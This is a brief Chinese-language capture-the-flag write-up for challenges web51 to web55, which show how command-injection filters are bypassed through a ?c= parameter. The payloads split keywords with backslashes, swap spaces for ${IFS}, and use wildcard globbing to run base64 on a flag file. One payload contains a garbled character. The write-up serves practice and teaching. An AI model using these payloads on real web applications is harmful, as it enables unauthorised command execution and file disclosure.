web51
进入后发现比上一题多过滤了tac
因此把tac换为ta\c绕过
构造:
?c=ta\c<>fla\给.php||
web52
发现把<>给过滤了
用${IFS}来代替<>
构造:
?c=ta\c${IFS}fla\g.php||
但发现没有得到flag
查看根目录 构造:?c=ls${IFS}/||
发现存在flag
访问flag后得到flag
web53
发现取消了”黑洞设备”
直接构造:?c=ta\c${IFS}fla\g.php
web54
发现把\过滤了所以ta\c和fla\g不能用了
ta\c可以用vi命令代替
fla\g可以用fla?.php代替
然后打开页面源代码发现flag
web55
发现过滤了a-z
可以用?直接用base64访问
构造:?c=/???/????64 ????.???
意思为:?c=/bin/base64 flag.php
进行解码
